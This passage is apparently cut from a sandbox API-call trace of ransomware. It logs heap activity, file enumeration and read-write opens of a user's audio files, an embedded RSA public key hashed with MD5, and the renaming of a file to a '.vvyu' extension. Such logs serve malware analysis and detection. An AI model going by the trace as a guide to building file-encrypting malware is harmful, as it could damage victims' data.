(HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0197.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0197.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0197.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a3a8 [0197.230] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0197.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0197.231] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0197.231] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0197.231] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0197.231] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0197.231] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0197.231] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a3c0 [0197.231] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0197.231] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0197.231] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0197.231] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a390 [0197.231] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0197.231] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a420 [0197.231] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0197.231] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0197.231] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0197.231] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a3f0 [0197.231] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0197.231] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a3d8 [0197.231] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0197.231] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a438 [0197.231] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3d8 | out: hHeap=0x6a0000) returned 1 [0197.231] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a3d8 [0197.231] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3f0 | out: hHeap=0x6a0000) returned 1 [0197.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0197.232] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0197.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0197.232] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0197.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0197.232] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3a8 | out: hHeap=0x6a0000) returned 1 [0197.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a3a8 [0197.232] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0197.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0197.232] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a408 | out: hHeap=0x6a0000) returned 1 [0197.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bfe0 [0197.232] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a438 | out: hHeap=0x6a0000) returned 1 [0197.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0197.232] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0197.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c0ec50 [0197.232] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0197.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0197.232] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3a8 | out: hHeap=0x6a0000) returned 1 [0197.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0197.233] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bfe0 | out: hHeap=0x6a0000) returned 1 [0197.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0197.233] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0197.233] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea920 | out: hHeap=0x6a0000) returned 1 [0197.234] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0197.234] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0197.234] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0197.234] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0197.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0197.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0197.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0197.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0197.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3d8 | out: hHeap=0x6a0000) returned 1 [0197.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0197.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a420 | out: hHeap=0x6a0000) returned 1 [0197.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0197.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3c0 | out: hHeap=0x6a0000) returned 1 [0197.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a390 | out: hHeap=0x6a0000) returned 1 [0197.237] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4d790 | out: hHeap=0x6a0000) returned 1 [0197.237] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84cc0 | out: hHeap=0x6a0000) returned 1 [0197.237] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0197.237] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a378 | out: hHeap=0x6a0000) returned 1 [0197.238] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2d1f0 | out: hHeap=0x6a0000) returned 1 [0197.238] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0197.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0197.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0197.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0197.240] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0197.240] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0197.240] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0197.240] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0197.241] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0197.241] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0197.241] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0197.241] WriteFile (in: hFile=0x52c, lpBuffer=0x2d4f778*, nNumberOfBytesToWrite=0x6ce1, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d4f778*, lpNumberOfBytesWritten=0x30ffb14*=0x6ce1, lpOverlapped=0x0) returned 1 [0197.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4f778 | out: hHeap=0x6a0000) returned 1 [0197.243] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x6ce6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.243] WriteFile (in: hFile=0x52c, lpBuffer=0x2be2220*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2be2220*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0197.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0197.244] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0197.244] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0197.244] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0197.244] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0197.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0197.245] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0197.245] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0197.245] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.245] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0197.246] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0197.246] CloseHandle (hObject=0x52c) returned 1 [0197.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xd0) returned 0x2d31688 [0197.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8e0) returned 0x2d3a670 [0197.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0197.249] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\WL5kmFtLwSv3.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\psrckmpedif_ oxvk\\61x to95hr3jmn6z\\wl5kmftlwsv3.m4a"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\WL5kmFtLwSv3.m4a.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\psrckmpedif_ oxvk\\61x to95hr3jmn6z\\wl5kmftlwsv3.m4a.vvyu")) returned 1 [0197.258] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0197.258] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0197.258] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0197.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0197.261] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25e91340, ftCreationTime.dwHighDateTime=0x1d89943, ftLastAccessTime.dwLowDateTime=0x8e9d6480, ftLastAccessTime.dwHighDateTime=0x1d89ead, ftLastWriteTime.dwLowDateTime=0x8e9d6480, ftLastWriteTime.dwHighDateTime=0x1d89ead, nFileSizeHigh=0x0, nFileSizeLow=0x15255, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="X52P6pB3THpumW.wav", cAlternateFileName="X52P6P~1.WAV")) returned 1 [0197.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x106) returned 0x2c4bb80 [0197.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.262] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\X52P6pB3THpumW.wav") returned=".wav" [0197.262] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\X52P6pB3THpumW.wav" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\psrckmpedif_ oxvk\\61x to95hr3jmn6z\\x52p6pb3thpumw.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0197.264] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=86613) returned 1 [0197.264] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0197.266] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x1522f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.266] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0197.268] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0197.268] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0197.268] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.268] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x15255, lpOverlapped=0x0) returned 1 [0197.270] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.270] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0197.270] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.270] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.270] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea920) returned 1 [0197.271] CryptCreateHash (in: hProv=0x6ea920, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0197.271] CryptHashData (hHash=0x2cbf990, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0197.271] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0197.271] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0197.271] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0197.271] GetLastError () returned 0x0 [0197.271] CryptDestroyHash (hHash=0x2cbf990) returned 1 [0197.271] CryptReleaseContext (hProv=0x6ea920, dwFlags=0x0) returned 1 [0197.272] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0197.272] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0197.272] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0197.272] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0197.272] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0197.272] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0197.272] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0197.272] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x15260) returned 0x2d4f778 [0197.273] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0197.273] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0197.273] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0197.273] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0197.273] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0197.273] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0197.273] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d1f0 [0197.274] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a378 [0197.274] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d238 [0197.274] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a390 [0197.274] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a3c0 [0197.274] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a420 [0197.274] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a3d8 [0197.274] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0197.274] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0197.274] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0197.274] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0197.274] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3c0 | out: hHeap=0x6a0000) returned 1 [0197.274] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3d8 | out: hHeap=0x6a0000) returned 1 [0197.274] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a420 | out: hHeap=0x6a0000) returned 1 [0197.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0197.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.275] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a420 [0197.275] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0197.275] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a3d8 [0197.275] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0197.275] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a3c0 [0197.275] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0197.275] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2be2220 [0197.275] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0197.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0197.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0197.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bec8 [0197.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c443e8 [0197.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0197.276] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0197.276] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3d8 | out: hHeap=0x6a0000) returned 1 [0197.276] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0197.276] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3c0 | out: hHeap=0x6a0000) returned 1 [0197.276] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0197.276] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0197.277] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a420 | out: hHeap=0x6a0000) returned 1 [0197.277] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0197.277] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0197.278] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0197.278] GetCurrentThreadId () returned 0x264 [0197.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0197.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d4baf0 [0197.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, 